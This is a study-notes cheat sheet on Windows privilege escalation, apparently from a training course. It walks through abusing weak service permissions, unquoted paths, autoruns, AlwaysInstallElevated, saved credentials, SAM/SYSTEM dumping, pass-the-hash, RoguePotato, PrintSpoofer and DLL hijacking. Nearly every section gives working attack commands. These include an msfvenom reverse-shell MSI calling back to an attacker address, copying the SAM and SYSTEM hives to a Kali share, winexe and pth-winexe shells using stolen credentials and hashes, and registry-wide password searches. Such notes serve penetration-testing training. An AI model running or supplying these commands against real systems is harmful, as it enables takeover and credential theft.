Windows Privilege Escalation

Source: From Tiberius course.

Date: 28th August 2021

Enumerate the basics

PrintSpoofer and Juicy Potato can be easy loot!

whoami /all

# Old OS? Think of searching for Kernel Exploit. 
systeminfo

Insecure Service Permission

Check for if a user has SERVICE_CHANGE_CONGIF or SERVICE_ALL_ACCESS. That could be dangerous.

Find permissions on a service with accesschk.exe

accesschk is a Microsoft tool for auditing privileges on Objects and Services on a Windows system.

Check the permissions of the user "user" on "daclsvc" service.

C:\PrivEsc\accesschk.exe /accepteula -uwcqv user daclsvc

-u: supress error -w: show only object that have write access -v: verbose -c: Name is a Windows Service -q: Omit Banner

/accepteula: This flag means that we accept the End User License Agreement (EULA), despite being a CLI application. See this: https://xor.cat/2017/09/05/sysinternals-accesschk-accepteula/

The first image shows that we can change the service configuration, start and stop the program with our user.

This second image show that the program is start on demand of the user, and that it runs with SYSTEM privileges. We also have the binary PATH of the program. Therefore, we can modify the binary path to a reverse shell executable of our own.

Changing BINARY_PATH_NAME

Conditions

  1. To be able to write into the service PATH.

  2. To be able to start/stop the service or to reboot the system.

Note: The xyntax is quite important.

sc config daclsvc binpath= "\"C:\PrivEsc\reverse.exe\""

Then, we can restart the service again to spawn a reverse shell.

net start daclsvc

Unquoted Service Path

Use automatic enumeration tool to identify unquoted service path

Conditions

  1. To be able to write into the service PATH.

  2. To be able to start/stop the service or to reboot the system.

The unquoted service path technique is about abusing the executing path of the file.

WinPEAS.exe can help us identify this vulnerabilities on Windows system.

In this binary path below, we can notice that it is unquoted and that there is some space between some directories. Windows will check between each space to check if a executable exists. If it encounter one, it will execute it instead of the executable at the end of the path.

Here, we have to find a directory that is writable by our user. Then, put the executable in this directory and change its name for Windows to execute it. In the image below, we can see that everyone in the group Users can write in the "C:\Program Files\Unquoted Path Service"

Then we just need to copy the reverse.exe in this directory and name it Common.exe according to the full path of the Binary_PATH_Name found above.

copy "C:\PrivEsc\reverse.exe" "C:\Program Files\Unquoted Path Service\Common.exe"

Windows will then execute

"C:\Program Files\Unquoted Path Service\Common.exe" 

AND NOT 

"C:\Program Files\Unquoted Path Service\Common Files\unquotedservicepath.exe" as expected.

Weak Registry Permissions

Description: Each service has its own Registry key that can be modified if misconfigured. This can allow an attacker to modify the ImagePath which is similar to modify the binary path of a service.

WinPEASany.exe can help us to identify Registry Entry that our user can modify. We can also note, using accesschk.exe, that the registry entry can be writable by NT AUTHORITY\INTERACTIVE group (which incudes all logged-on users) and that it can be START/STOP by our user.

With the following command, we can also note that the service runs with SYSTEM privilege.

sc qc [serviceName]]

This command will change the service regsvc Image Path to point to our executable (reverse shell).

reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d C:\PrivEsc\reverse.exe /f

Start the service with net start regsvc.

Insecure Service Executables

Description: If the service executable can be modified by our user, we can just replace it with our own executable.

WinPEASany.exe can help us point out which executable can be modified by our user.

Using accesschk.exe, we can note that the Binary Path of this service is writable by everyone.

C:\PrivEsc\accesschk.exe /accepteula -quvw "C:\Program Files\File Permissions Service\filepermservice.exe"

Then, we can just replace the executable with our reverse shell or payload executable. We can start the service to spawn the shell.

IMPORTANT NOTE: Do not forget to make a copy of the original executable.

Registry Autoruns

Description: This privesc technique is based on the fact that if a program that autorun can be overwritten, we can replace the original program with a executable of our own.

Note: In Windows 10, at restart, autoruns will run the executable with the privileges of the last user that logged in. So, we may need to wait for an admin to log in on the system to get our admin reverse shell.

Note 2: DO NOT FORGET to back up the original Autoruns executable.

Step 1: WinPEASany.exe can help us point out if there is an Autoruns program with Writable permission.

winPEASany.exe quiet applicationsinfo

Another way to enumerate manually we can query the registry entry, then check with accesschk.exe if we can have Write permission.

reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
C:\PrivEsc\accesschk.exe /accepteula -wvu "C:\Program Files\Autorun Program\program.exe"

Then, we can overwrite the AutoRuns executable.

copy C:\PrivEsc\reverse.exe "C:\Program Files\Autorun Program\program.exe" /Y

In a real World Scenario wait for an admin to logged in... to spawn a reverse shell as admin.

Registry - AlwaysInstallElevated

Description: This technique is based on the fact that MSI files (packages files to install applications) can be set to run with elevated privileges. A malicious MSI file spawning a reverse shell can then be generated and executed with eleveted privileges.

Conditions for this technique to work (two keys needs to be set to 1):

# Current user

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

# Local Machine
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

We can also use WinPEASany to check if those two keys are setted to 1.

WinPEASany.exe quiet windowscreds

Create a MSI reverse shell: If we meet both conditions, we can create a reverse shell in MSI format.

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.6.80.201 LPORT=53 -f msi -o reverse.msi

Once the payload is transferred to the target machine and our listener set up, we can run the MSI executable with the command below to spawn a shell as SYSTEM.

msi /quiet /qn /i C:\PrivEsc\reverse.msi

Password - Registry

Description: Sometime, passwords can be stored in registry keys. WinPEASany.exe can help us find some creds.

winPEASany.exe quiet filesinfo userinfo

We can also manually query registry keys. These two commands will search for any registry keys that contains the word password. This can generate a lot of results.

#Search in the Local Machine registry Entry
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f pass /t REG_SZ /s

#Search in the Current registry Entry
reg query HKCU /f password /t REG_SZ /s
reg query HKCU /f pass /t REG_SZ /s

Search for autologon credentials in registry keys

reg query "HKLM\Software\Microsoft\WindowsNT\CurrentVersion\winlogon"

We can then try to use winexe programe to spawn a shell with the credentials we found.

In Kali use this:

winexe -U 'admin%password' //10.10.250.208 cmd.exe

If we want to spawn a SYSTEM shell we can slightly modify the command.

winexe -U 'admin%password' --system //10.10.250.208 cmd.exe

Password - Save Creds

Description: On Windows, the runas command allows user to run command as other user. Most of the time, the credentials of the user we want to run the command as are required. However, sometime the credentials are saved in the system.

WinPEASany.exe can help us find if a user has saved creds.

winPEASany.exe quiet cmd windowscreds

We can also do it manually:

cmdkey /list

In the image below, we can note that there is some creds saved for the admin user.

Then, we can run any command we want with the admin privileges. We execute the reverse shell executable with admin privileges.

runas /savecred /user:admin C:\PrivEsc\reverse.exe

Passwords - Configuration Files

Description: It can be worth to look for credentials in configuration files. The Unattend.xml file may be found on the system and contain some credentials.

We can search manually for .config files with the word password in some directories of interest.

Variants of password term

password
password = 
password=
DB_PASS
passwords
pass
passwd
creds
credentials
crendential

Examples:

Recursively search for files in the current directory with "pass" in the name or ending with .config.

dir /s *pass* == *.config

Recursively search for files in the current directory that contain the word "password" and also end in either .xml, .ini. .txt.

findstr /si password *.xml *.ini *.txt

WinPEASany.exe can also be useful.

WinPEASany.exe quiet cmd searchfast filesinfo

Below, we see that the Unattend.xml file has been flagged and may contain some creds.

We can then use this creds found to spawn a reverse shell with the admin privileges using winexe on our Kali attacker machine.

Passwords mining

type unattend.xml | findstr /i password

Few files that are likely to contains credentials

  • C:\sysprep.inf

  • C:\sysprep\sysprep.xml

  • C:\Windows\Panther\Unattend\Unattended.xml

SAM backup

  • C:\windows\System32\config\RegBack\SAM

  • C:\windows\repair\SAM

Software/Programs

  • C:\xampp\FileZillaFTP\FileZillaServer.xml

  • C:\xampp\phpMyAdmin\config.inc

  • C:\xampp\security\webdav.htpasswd

  • C:\Users\<username>\.AppData\roaming\...

Password mining - Lazagne.exe

From the official Github repo: The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. This project is still maintained. 

laZagne.exe all

Password - SAM and SYSTEM files

Description: The SAM file contains all NTLM hash of the user on the machine. However, we need the SYSTEM file to decypt the hash.

THe SAM and SYSTEM files are located in the C:\Windows\System32\config directory. The files are locked while Windows is running.

But back up of these two files can exists in C:\Windows\Repair OR C:\Windows\System32\config\RegBack

Step 1: Find SAM and SYSTEM file

We can use WinPEASany to help us flag backup of the SAM and SYSTEM file.

winPEASany.exe quiet cmd windowscreds

Step 2: Transfer the files from Windows on your Kali

copy C:\Windows\Repair\SAM \\10.10.10.10\kali\
copy C:\Windows\Repair\SYSTEM \\10.10.10.10\kali\

Step 3: Dump the hashes.

Use this repo to dump the NTLM hashes

https://github.com/Tib3rius/creddump7

python3 pwdump.py /home/amandine/SYSTEM /home/amandine/SAM

Note: The first part of the hash : is LTM hash wich is deprecated. Use the second part (NTLM).

If a hash start with 316d, this could means that the user does not have a password set up or the user is disabled.

Example of output

admin:1001:aad3b435b51404eeaad3b435b51404ee:a9fdfa038c4b75ebc76dc855dd74f0da:::

Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

Then, we can crack the hash for the admin user and use the credentials with winexe to spawn a shell with admin privilege.

Password - Pass the Hash

Description: A modified version of winexe allows us to execute command as a user without the need of cracking the hash.

Once we got the hash of the user admin, we can pass it to path-winexe.

Note: We need to pass the entire hash (LM +NTLM)

pth-winexe -U 'admin%aad3b435b51404eeaad3b435b51404ee:a9fdfa038c4b75ebc76dc855dd74f0da:::' //10.10.13.5 cmd.exe 

For a system shell add --system to the command.

Scheduled Tasks

Description: Some scripts may runs as SYSTEM or Admin on a regular basis. There is no easy way to enumerate scheduled tasks that runs as other users.

Important: Do not forget to backup the original script.

Use this commands to check for scheduled task that the user can see.

schtasks /query /fo LIST /v

In Powershell:

PS> Get-ScheduledTask | where {$_.TaskPath -notlike
"\Microsoft*"} | ft TaskName,TaskPath,State

If we can find a script that runs as SYSTEM and that is writable by our user, we can add our own code wait for the script to run.

For example, we can note that using accesschk, the CleanUp.ps1 script is writable by our user.

C:\PrivEsc\accesschk.exe /accepteula -quvw user C:\DevTools\CleanUp.ps1

Add our own code

echo C:\PrivEsc\reverse.exe >> C:\DevTools\CleanUp.ps1

Insecure GUI Apps

Description: Some apps can be used with admin privileges. Often used to break out from Citrix Environment

Example: MS PAINT.

# Enumerate all task currently running and check with which user it run. 
tasklist /V 

# If we want to check if a specific service that run as admin

tasklist /V | findstr mspaint.exe

In Paint, click "File" and then "Open". In the open file dialog box, click in the navigation input and paste: file://c:/windows/system32/cmd.exe

Press Enter to spawn a command prompt running with admin privileges.

Startup apps

Description: The startup directory in Windows is intended to store shorcut for apps that start every time a user logs in. Thus, if we have write access to this directory, we can create a shortcut that point our reverse shell and wait for an admin to log. This will spawn us a reverse shell with admin privileges.

Step 1: Verify write permission on the startup directory

C:\PrivEsc\accesschk.exe /accepteula -d "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp"

Output
RW BUILTIN\Users

# This means every users in the group Users have write permission on the directory.

Step 2: To create a shortcut for our reverse shell executable.

  • use the one from Tiberius and modify it to suit your needs)

This script take our reverse shell, create a short cut and put it in the startUp directory.

cscript C:\PrivEsc\CreateShortcut.vbs

Step 3: Wait for an admin to log in...

Token Impersonation

Description: Rogue Potato and PrintSpoofer are two exploit that abuse from seImpersonate and SeAssignPrimaryToken privilege of a service account.

The first step is to get a shell as an service account. There is multiple way of getting a shell as service account. Once, we get it, we can escalate our privilege with PrintSpoofer or Rogue Potato.

Rogue Potato

RoguePotato follows Rotten and JuicyPotato as these two exploits does not work anymore on the latest version of Windows. In the RoguePotato exploit, we need to peform a port forwarding on port 135 because this is were the OXID resolver is running. We can perform that on our Kali machine (attacker box) by doing so:

socat tcp-listen:135,reuseaddr,fork tcp:10.10.10.180:9999

Then, we need to run our Service account shell. For the exploit to be successful the account service from which we get a shell needs to have the seImpersonateprivilege and seAssignPrimaryToken enabled.

We can verify this by doing so:

whoami /priv

The, if we have the required permissions, we can run the RoguePotato exploit doing so:

C:\PrivEsc\RoguePotato.exe -r [kali IP] -e "C:\PrivEsc\reverse.exe" -l 9999

Conditions to exploit are:

  • Need of a local service account shell on the target machine(can be spawn in different ways ex: IIS/MSSQL).

  • DCOM needs to be enabled

  • Our local service account needs to have the two privileges mentionned above.

  • The port 135 on our attack box needs to be available for port fowarding.

PrintSpoofer

Description: The PrintSpoofer technique is also based upon abusing of SeImpersonatePrivilege and SeAssignPrimaryToken. PrintSpoofer can be used even if DCOM is disabled on the target Windows server.

Works on Windows Server 2016, Windows Server 2019 and Windows 10. No port fowarding are requested. You need a first footstep on the machine with a Local Service shell or any other account with the SeImpersonatePrivilege.

You can download the reverse shell and the PrintSpoofer exploit on the target machine and then:

C:\PrivEsc\PrintSpoofer.exe -c "C:\PrivEsc\reverse.exe" -i

GitHubRepo: https://github.com/itm4n/PrintSpoofer

Great article about PrintSpoofer Impersonate Privileges: https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/

DLL Hijacking

Description: When a Windows application load an infected DLL instead of the legitimated one. If an application does not specify any dll path to load from, Windows has a safe search or unsafe search mode. This is the list in order of all directories that the application will look for the dll. If one of those directory is writable by our user, we can load a malicious .dll file (ex: reverse shell) that will be executed when the program is running.

Procmon by Windows can help us identify a DLL hijacking attack.

Great blog articles on DLL Hijacking: https://www.upguard.com/blog/dll-hijacking

Another great blog on DLL Hijacking: https://itm4n.github.io/windows-dll-hijacking-clarified/

https://posts.specterops.io/automating-dll-hijack-discovery-81c4295904b0

Windows Kernel Exploit

Google the old OS

Use Windows Exploit Suggester or Windows Exploit Suggester Next Generation.

Windows exploit suggester

python2 windows-exploit-suggester.py --database 2022-03-30-mssb.xls --systeminfo opti

Big repository of precompiled kernel exploits for Windows. 👍

Watson tool to find exploit Kernel: https://github.com/rasta-mouse/Watson

Others elements

Others resources

Payloads all the things on GitHub summarize a lot of Privilege Escalation tools for Windows: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md

Great articles on Token Access Privilege: https://github.com/hatRiot/token-priv/blob/master/abusing_token_eop_1.0.txt

PreviousLinux Privilege EscalationNextPrivilege escalation - Linux

Last updated